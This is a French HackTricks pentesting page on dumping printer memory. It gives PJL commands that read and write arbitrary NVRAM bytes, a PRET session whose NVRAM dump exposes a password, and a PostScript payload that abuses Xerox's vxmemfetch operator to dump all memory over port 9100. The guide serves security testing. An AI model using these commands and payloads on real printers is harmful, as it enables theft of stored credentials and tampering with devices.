hacktricks/network-services-pentesting/pentesting-printers/memory-access.md

4 KiB

Apprenez le hacking AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!

Autres moyens de soutenir HackTricks :

Vous pouvez essayer de dumper la NVRAM et d'extraire des informations confidentielles (comme des mots de passe) de là.

Dans PJL (Brother), vous pouvez accéder à des adresses NVRAM arbitraires en utilisant PJL comme indiqué ci-dessous :

@PJL RNVRAM ADDRESS = X              # read byte at location X
@PJL WNVRAM ADDRESS = X DATA = Y     # write byte Y to location X

Vous pouvez tester cette attaque en utilisant PRET :

./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> nvram dump
Writing copy to nvram/printer
................................................................................
................................................................................
............................................MyS3cretPassw0rd....................
................................................................................

Certains modèles d'imprimantes Xerox disposent d'un opérateur PostScript vxmemfetch propriétaire intégré, qui permet à un attaquant de lire des adresses mémoire arbitraires. En utilisant une boucle PostScript, cette fonctionnalité peut être facilement utilisée pour vider la totalité de la mémoire comme montré ci-dessous (PRET n'a pas cette attaque donc vous devrez envoyer ce payload au port 9100 dans une connexion nc) :

/counter 0 def 50000 {
/counter counter 1 add def
currentdict /RRCustomProcs /ProcSet findresource begin
begin counter 1 false vxmemfetch end end == counter
} repeat

Plus d'informations ici : http://hacking-printers.net/wiki/index.php/Memory_access

Apprenez le hacking AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert) !

Autres moyens de soutenir HackTricks :